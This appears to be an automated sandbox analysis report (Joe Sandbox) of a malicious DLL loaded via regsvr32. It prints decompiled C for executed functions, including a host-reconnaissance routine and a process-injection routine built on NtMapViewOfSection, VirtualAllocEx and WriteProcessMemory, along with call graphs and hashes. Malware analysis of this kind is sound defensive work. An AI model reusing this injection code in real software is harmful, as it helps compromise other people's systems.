10009601 2 API calls 13113->13114 13115 1000548d 13114->13115 13116 100085c2 2 API calls 13115->13116 13117 10005495 13116->13117 13118 1000861a 2 API calls 13117->13118 13119 100054b0 13118->13119 13120 1000a911 2 API calls 13119->13120 13121 100054bd 13120->13121 13122 1000b1b1 10 API calls 13121->13122 13123 10005526 13121->13123 13122->13121 13124 1000861a 2 API calls 13123->13124 13124->13125 13126->13111 13204 10002551 13205 10002565 13204->13205 13206 100025bc 13204->13206 13207 10009749 2 API calls 13205->13207 13219 100025ab 13206->13219 13220 10001b2d 13206->13220 13208 1000256f 13207->13208 13210 10009749 2 API calls 13208->13210 13213 1000257c 13210->13213 13211 100094b7 2 API calls 13212 100025d6 13211->13212 13214 10009f06 4 API calls 13213->13214 13213->13219 13215 10002594 13214->13215 13216 10009f06 4 API calls 13215->13216 13217 100025a1 13216->13217 13218 10009f06 4 API calls 13217->13218 13218->13219 13219->13211 13221 10001b46 13220->13221 13222 10001bb3 13221->13222 13224 1000980c GetSystemTimeAsFileTime 13221->13224 13231 10001c26 13221->13231 13223 1000980c GetSystemTimeAsFileTime 13222->13223 13225 10001bbd GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 13223->13225 13224->13221 13232 10001a1b 13225->13232 13228 10009f06 4 API calls 13229 10001c15 13228->13229 13229->13231 13251 10006890 13229->13251 13231->13219 13233 10001a82 13232->13233 13234 10001a3c 13232->13234 13235 10001aac 13233->13235 13237 1000160d 7 API calls 13233->13237 13236 10009ea5 3 API calls 13234->13236 13239 10001778 4 API calls 13235->13239 13247 10001ab4 13235->13247 13238 10001a44 13236->13238 13237->13235 13240 10009e66 3 API calls 13238->13240 13246 10001ac3 13239->13246 13241 10001a50 13240->13241 13242 10001a6e 13241->13242 13248 100096ca memset 13241->13248 13244 1000861a 2 API calls 13242->13244 13243 10001b10 13245 1000861a 2 API calls 13243->13245 13244->13233 13245->13247 13246->13243 13246->13247 13249 10001ad7 inet_ntoa lstrcpynA 13246->13249 13247->13228 13247->13229 13248->13242 13250 1000160d 7 API calls 13249->13250 13250->13246 13252 1000861a 2 API calls 13251->13252 13253 100068b0 13252->13253 13254 1000861a 2 API calls 13253->13254 13255 100068ba 13254->13255 13256 1000861a 2 API calls 13255->13256 13257 100068c4 13256->13257 13258 1000861a 2 API calls 13257->13258 13259 100068ce 13258->13259 13260 1000861a 2 API calls 13259->13260 13261 100068d8 13260->13261 13262 1000861a 2 API calls 13261->13262 13263 100068e2 13262->13263 13264 1000861a 2 API calls 13263->13264 13277 100068ec 13264->13277 13265 10006992 13267 1000861a 2 API calls 13265->13267 13266 10006944 13268 1000861a 2 API calls 13266->13268 13272 100069a1 13267->13272 13273 10006952 13268->13273 13269 1000698a 13271 1000861a 2 API calls 13269->13271 13270 1000861a HeapFree memset 13270->13277 13271->13265 13272->13231 13276 1000861a 2 API calls 13273->13276 13274 1000861a 2 API calls 13275 1000695a 13274->13275 13275->13265 13275->13269 13275->13274 13276->13275 13277->13266 13277->13270 13277->13275 13282 10002454 13283 1000246a 13282->13283 13292 10002509 13282->13292 13284 1000b4a3 2 API calls 13283->13284 13286 10002477 13284->13286 13285 100094b7 2 API calls 13287 10002516 13285->13287 13304 10009569 13286->13304 13290 10009256 2 API calls 13291 10002485 13290->13291 13291->13292 13293 1000109a HeapAlloc 13291->13293 13292->13285 13294 10002498 13293->13294 13295 100092e5 2 API calls 13294->13295 13296 100024b0 13295->13296 13297 100085d5 2 API calls 13296->13297 13298 100024be 13297->13298 13299 100024fa 13298->13299 13300 1000a911 2 API calls 13298->13300 13301 1000861a 2 API calls 13299->13301 13302 100024dd 13300->13302 13301->13292 13303 1000861a 2 API calls 13302->13303 13303->13299 13305 10009572 13304->13305 13307 1000247e 13304->13307 13308 10008604 HeapAlloc 13305->13308 13307->13290 13308->13307

                            Executed Functions

                            Function 1000D01F, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 282COMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 91%
                            			E1000D01F(void* __fp0) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				struct _SYSTEM_INFO _v52;
				char _v180;
				short _v692;
				char _v704;
				char _v2680;
				void* __esi;
				struct _OSVERSIONINFOA* _t81;
				intOrPtr _t83;
				void* _t84;
				long _t86;
				void** _t88;
				intOrPtr _t90;
				intOrPtr _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				void* _t98;
				intOrPtr _t103;
				char* _t105;
				void* _t108;
				intOrPtr _t111;
				long _t115;
				signed int _t117;
				long _t119;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t130;
				intOrPtr _t134;
				intOrPtr _t145;
				intOrPtr _t147;
				intOrPtr _t149;
				intOrPtr _t152;
				intOrPtr _t154;
				signed int _t159;
				struct HINSTANCE__* _t162;
				short* _t164;
				intOrPtr _t167;
				WCHAR* _t168;
				char* _t169;
				intOrPtr _t181;
				intOrPtr _t200;
				void* _t215;
				long _t218;
				void* _t219;
				char* _t220;
				struct _OSVERSIONINFOA* _t222;
				void* _t223;
				int* _t224;
				void* _t241;

				_t241 = __fp0;
				_t162 =  *0x1001e69c; // 0x10000000
				_t81 = E10008604(0x1ac4);
				_t222 = _t81;
				if(_t222 == 0) {
					return _t81;
				}
				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
				_t83 =  *0x1001e684; // 0x2e0faa0
				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
				_t3 = _t222 + 0x648; // 0x648
				E10012301( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
				_t5 = _t222 + 0x1644; // 0x1644
				_t216 = _t5;
				_t86 = GetModuleFileNameW(0, _t5, 0x105);
				_t227 = _t86;
				if(_t86 != 0) {
					 *((intOrPtr*)(_t222 + 0x1854)) = E10008FBE(_t216, _t227);
				}
				GetCurrentProcess();
				_t88 = E1000BA05(); // executed
				 *(_t222 + 0x110) = _t88;
				_t178 =  *_t88;
				if(E1000BB8D( *_t88) == 0) {
					_t90 = E1000BA62(_t178, _t222); // executed
					__eflags = _t90;
					_t181 = (0 | _t90 > 0x00000000) + 1;
					__eflags = _t181;
					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
				} else {
					 *((intOrPtr*)(_t222 + 0x214)) = 3;
				}
				_t12 = _t222 + 0x220; // 0x220, executed
				_t91 = E1000E3F1(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
				_t92 = E1000E3B6(_t12); // executed
				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
				 *(_t222 + 0x224) = _t162;
				_v12 = 0x80;
				_v8 = 0x100;
				_t22 = _t222 + 0x114; // 0x114
				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
					GetLastError();
				}
				_t97 =  *0x1001e694; // 0x2e0fbf8
				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
				_t26 = _t222 + 0x228; // 0x228
				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
				GetLastError();
				_t31 = _t222 + 0x228; // 0x228
				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
				_t34 = _t222 + 0x114; // 0x114, executed
				_t103 = E1000B7A8(_t34,  &_v692);
				_t35 = _t222 + 0xb0; // 0xb0
				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
				_push(_t35);
				E1000B67D(_t103, _t35, _t98, _t241);
				_t37 = _t222 + 0xb0; // 0xb0
				_t105 = _t37;
				_t38 = _t222 + 0xd0; // 0xd0
				_t164 = _t38;
				if(_t105 != 0) {
					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
					if(_t159 > 0) {
						_t164[_t159] = 0;
					}
				}
				_t41 = _t222 + 0x438; // 0x438
				_t42 = _t222 + 0x228; // 0x228
				E10008FD8(_t42, _t41);
				_t43 = _t222 + 0xb0; // 0xb0
				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
				_t44 = _t222 + 0x100c; // 0x100c
				E1000B88A(_t108, _t44, _t241);
				_t199 = GetCurrentProcess(); // executed
				_t111 = E1000BBDF(_t110); // executed
				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
				memset(_t222, 0, 0x9c);
				_t224 = _t223 + 0xc;
				_t222->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t222);
				_t167 =  *0x1001e684; // 0x2e0faa0
				_t115 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
					_t115 = _v8;
				}
				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
				if(_t115 == 0) {
					GetSystemInfo( &_v52);
					_t117 = _v52.dwOemId & 0x0000ffff;
				} else {
					_t117 = 9;
				}
				_t54 = _t222 + 0x1020; // 0x1020
				_t168 = _t54;
				 *(_t222 + 0x9c) = _t117;
				GetWindowsDirectoryW(_t168, 0x104);
				_t119 = E100095E1(_t199, 0x10c);
				_t200 =  *0x1001e684; // 0x2e0faa0
				_t218 = _t119;
				 *_t224 = 0x104;
				_push( &_v704);
				_push(_t218);
				_v8 = _t218;
				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
					_t154 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
				}
				E100085D5( &_v8);
				_t124 =  *0x1001e684; // 0x2e0faa0
				_t61 = _t222 + 0x1434; // 0x1434
				_t219 = _t61;
				 *_t224 = 0x209;
				_push(_t219);
				_push(L"USERPROFILE");
				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
					E10009640(_t219, 0x105, L"%s\\%s", _t168);
					_t152 =  *0x1001e684; // 0x2e0faa0
					_t224 =  &(_t224[5]);
					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
				}
				_push(0x20a);
				_t64 = _t222 + 0x122a; // 0x122a
				_t169 = L"TEMP";
				_t127 =  *0x1001e684; // 0x2e0faa0
				_push(_t169);
				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
					_t149 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
				}
				_push(0x40);
				_t220 = L"SystemDrive";
				_push( &_v180);
				_t130 =  *0x1001e684; // 0x2e0faa0
				_push(_t220);
				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
					_t147 =  *0x1001e684; // 0x2e0faa0
					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
				}
				_v8 = 0x7f;
				_t72 = _t222 + 0x199c; // 0x199c
				_t134 =  *0x1001e684; // 0x2e0faa0
				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
				_t75 = _t222 + 0x100c; // 0x100c
				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
				_t76 = _t222 + 0x1858; // 0x1858
				E100122D3( &_v2680, _t76, 0x20);
				_t79 = _t222 + 0x1878; // 0x1878
				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
				_t145 = E1000CD33(_t79); // executed
				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
				return _t222;
			}






















































                            0x1000d01f
                            0x1000d029
                            0x1000d035
                            0x1000d03a
                            0x1000d03f
                            0x1000d3ff
                            0x1000d3ff
                            0x1000d04c
                            0x1000d052
                            0x1000d057
                            0x1000d05d
                            0x1000d06d
                            0x1000d079
                            0x1000d079
                            0x1000d082
                            0x1000d088
                            0x1000d08a
                            0x1000d093
                            0x1000d093
                            0x1000d09f
                            0x1000d0a3
                            0x1000d0a8
                            0x1000d0ae
                            0x1000d0b7
                            0x1000d0c5
                            0x1000d0cc
                            0x1000d0d1
                            0x1000d0d1
                            0x1000d0d2
                            0x1000d0b9
                            0x1000d0b9
                            0x1000d0b9
                            0x1000d0d8
                            0x1000d0de
                            0x1000d0e3
                            0x1000d0e9
                            0x1000d0f1
                            0x1000d0fb
                            0x1000d108
                            0x1000d113
                            0x1000d11b
                            0x1000d13c
                            0x1000d13e
                            0x1000d13e
                            0x1000d140
                            0x1000d14a
                            0x1000d156
                            0x1000d166
                            0x1000d16c
                            0x1000d172
                            0x1000d174
                            0x1000d185
                            0x1000d18b
                            0x1000d191
                            0x1000d196
                            0x1000d19c
                            0x1000d1a2
                            0x1000d1a7
                            0x1000d1ac
                            0x1000d1ac
                            0x1000d1b2
                            0x1000d1b2
                            0x1000d1bb
                            0x1000d1c7
                            0x1000d1cf
                            0x1000d1d3
                            0x1000d1d3
                            0x1000d1cf
                            0x1000d1d7
                            0x1000d1dd
                            0x1000d1e3
                            0x1000d1ea
                            0x1000d1fb
                            0x1000d201
                            0x1000d209
                            0x1000d210
                            0x1000d212
                            0x1000d223
                            0x1000d229
                            0x1000d22e
                            0x1000d231
                            0x1000d234
                            0x1000d23a
                            0x1000d240
                            0x1000d242
                            0x1000d248
                            0x1000d251
                            0x1000d254
                            0x1000d254
                            0x1000d257
                            0x1000d25f
                            0x1000d26a
                            0x1000d270
                            0x1000d261
                            0x1000d263
                            0x1000d263
                            0x1000d279
                            0x1000d279
                            0x1000d27f
                            0x1000d287
                            0x1000d292
                            0x1000d297
                            0x1000d29d
                            0x1000d29f
                            0x1000d2ac
                            0x1000d2ad
                            0x1000d2ae
                            0x1000d2b9
                            0x1000d2bb
                            0x1000d2c2
                            0x1000d2c2
                            0x1000d2cc
                            0x1000d2d1
                            0x1000d2d6
                            0x1000d2d6
                            0x1000d2dc
                            0x1000d2e3
                            0x1000d2e4
                            0x1000d2f1
                            0x1000d304
                            0x1000d309
                            0x1000d30e
                            0x1000d317
                            0x1000d317
                            0x1000d31d
                            0x1000d322
                            0x1000d328
                            0x1000d32e
                            0x1000d333
                            0x1000d33c
                            0x1000d33e
                            0x1000d345
                            0x1000d345
                            0x1000d34b
                            0x1000d353
                            0x1000d358
                            0x1000d359
                            0x1000d35e
                            0x1000d367
                            0x1000d369
                            0x1000d374
                            0x1000d374
                            0x1000d37d
                            0x1000d385
                            0x1000d38c
                            0x1000d391
                            0x1000d3a0
                            0x1000d3b8
                            0x1000d3bf
                            0x1000d3cd
                            0x1000d3df
                            0x1000d3e6
                            0x1000d3ee
                            0x1000d3f3
                            0x00000000

                            APIs
                              • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                            • GetCurrentProcessId.KERNEL32 ref: 1000D046
                            • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                            • GetCurrentProcess.KERNEL32 ref: 1000D09F
                            • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                            • GetLastError.KERNEL32 ref: 1000D13E
                            • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                            • GetLastError.KERNEL32 ref: 1000D172
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                            • GetCurrentProcess.KERNEL32 ref: 1000D20E
                              • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                            • memset.MSVCRT ref: 1000D229
                            • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                            • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                            • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
                            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                            • API String ID: 1475707489-2706916422
                            • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                            • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                            • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000C6C0, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 200nativeregistrymemoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 86%
                            			E1000C6C0(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				void* _v32;
				intOrPtr _v36;
				long _v40;
				void* _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				void* _t69;
				intOrPtr _t75;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct _EXCEPTION_RECORD _t116;
				void* _t126;
				void* _t131;
				intOrPtr _t134;
				void* _t140;
				void* _t141;

				_t69 =  *0x1001e688; // 0x2d90590
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E1000E23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0x1001e780; // 0x2e0fbc8
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						NtClose(_v16);
					}
					return _v8;
				}
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
					if(_t106 != 0) {
						DestroyWindow(_t106); // executed
						UnregisterClassA( &_v56, 0);
					}
				}
				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_t126 = _v20;
					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
						goto L12;
					}
					_t140 = E10008669( *0x1001e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E1000861A( &_v32, 0x1ac4);
					_t141 =  *0x1001e688; // 0x2d90590
					 *0x1001e688 = _t131;
					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E1000C63F(_v12, _v8, _v36);
					 *0x1001e688 = _t141;
					goto L14;
				}
			}


























                            0x1000c6c6
                            0x1000c6cd
                            0x1000c6cf
                            0x1000c6d1
                            0x1000c6d3
                            0x1000c6d6
                            0x1000c6d9
                            0x1000c6dc
                            0x1000c6df
                            0x1000c6e2
                            0x1000c6e5
                            0x1000c6ef
                            0x1000c6f2
                            0x1000c6f9
                            0x1000c6fe
                            0x1000c6fe
                            0x1000c704
                            0x1000c706
                            0x1000c70f
                            0x1000c8b5
                            0x1000c8b9
                            0x1000c8be
                            0x1000c8c4
                            0x1000c8c7
                            0x1000c8c7
                            0x1000c8cb
                            0x1000c8d0
                            0x1000c8e2
                            0x1000c8e2
                            0x1000c8eb
                            0x1000c8f5
                            0x1000c8f5
                            0x1000c8fc
                            0x1000c8fc
                            0x1000c71e
                            0x1000c738
                            0x00000000
                            0x00000000
                            0x1000c743
                            0x1000c74d
                            0x1000c757
                            0x1000c75a
                            0x1000c760
                            0x1000c767
                            0x1000c768
                            0x1000c769
                            0x1000c772
                            0x1000c773
                            0x1000c774
                            0x1000c776
                            0x1000c779
                            0x1000c77c
                            0x1000c77f
                            0x1000c782
                            0x1000c78e
                            0x1000c7b0
                            0x1000c7b8
                            0x1000c7bb
                            0x1000c7c6
                            0x1000c7c6
                            0x1000c7b8
                            0x1000c7f1
                            0x1000c8b2
                            0x00000000
                            0x1000c7f7
                            0x1000c803
                            0x1000c818
                            0x00000000
                            0x00000000
                            0x1000c82e
                            0x1000c830
                            0x1000c837
                            0x00000000
                            0x00000000
                            0x1000c848
                            0x1000c85f
                            0x1000c86f
                            0x1000c87b
                            0x1000c880
                            0x1000c886
                            0x1000c896
                            0x1000c8a2
                            0x1000c8aa
                            0x00000000
                            0x1000c8aa

                            APIs
                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                            • RegisterClassExA.USER32 ref: 1000C785
                            • CreateWindowExA.USER32 ref: 1000C7B0
                            • DestroyWindow.USER32 ref: 1000C7BB
                            • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                            • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                            • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                            • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                              • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                            • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                            • NtClose.NTDLL(00000000), ref: 1000C8F5
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 2002808388-2319545179
                            • Opcode ID: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction ID: 6d8830cee459303ec09d51d2f03be3a40535ffb0f4457941fb28a5827401908c
                            • Opcode Fuzzy Hash: 142da9db68d52c38d717a02c0839c2ca2f1210e5572982ee18d12491895b5d42
                            • Instruction Fuzzy Hash: 50711A71900259AFEB11CF95CC89EAEBBB9FF49740F118069F605B7290D770AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 10005F82, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            C-Code - Quality: 82%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				long _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				void* _t38;
				void* _t49;
				struct _SECURITY_ATTRIBUTES* _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq"); // executed
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E100085EF();
				_t19 = E1000980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E10008F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0x1001e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E100095C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E100085C2( &_a8);
							_t53 =  &(_t53->nLength);
						} while (_t53 < 0x2710);
						E10012A5B( *0x1001e69c);
						 *_t55 = 0x7c3;
						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E100095E1(0x1001ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32); // executed
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E100085D5();
							_v8 = 0;
							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
							 *0x1001e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E100085D5();
					}
					goto L10;
				}
			}




















                            0x10005f82
                            0x10005f92
                            0x10005f9c
                            0x100060d0
                            0x100060c3
                            0x00000000
                            0x100060c5
                            0x100060d7
                            0x10006098
                            0x00000000
                            0x10006098
                            0x10005fa2
                            0x10005faa
                            0x10005fb1
                            0x10005fb3
                            0x00000000
                            0x10005fc6
                            0x10005fc6
                            0x10005fcc
                            0x10005fd2
                            0x10005fe2
                            0x10005fe7
                            0x10005fef
                            0x10005ff7
                            0x10006013
                            0x10006018
                            0x1000601b
                            0x1000601d
                            0x1000601f
                            0x1000602c
                            0x10006035
                            0x1000603e
                            0x10006043
                            0x10006044
                            0x10006052
                            0x1000605c
                            0x1000606d
                            0x10006072
                            0x10006079
                            0x10006080
                            0x10006083
                            0x1000608f
                            0x10006090
                            0x1000609c
                            0x100060a5
                            0x100060b7
                            0x100060ba
                            0x100060c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x100060c1
                            0x10006092
                            0x10006097
                            0x00000000
                            0x10005ff7

                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                            • SetLastError.KERNEL32(000000AA), ref: 100060D7
                              • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                              • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                              • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                            • GetLastError.KERNEL32 ref: 10005FEF
                            • memset.MSVCRT ref: 10006013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                            • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000006.00000002.610930393.0000000010000000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_10000000_regsvr32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 3435743081-3610097158
                            • Opcode ID: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction ID: 5d240a4b5adc479b0f810b05b199863bf69006de757f0dcc77d76d9ad36975de
                            • Opcode Fuzzy Hash: 4f0bd1883edd1a52277ce24a9e1719a690fb83a9cd489a56b0391a9d10c83903
                            • Instruction Fuzzy Hash: 8C31E574900654ABF754DB30CC89E6F37A9EF893A0F20C229F855C6195DB34EB49CB21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 1000CB77, Relevance: 7.6, APIs: 5, Instructions: 105nativeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
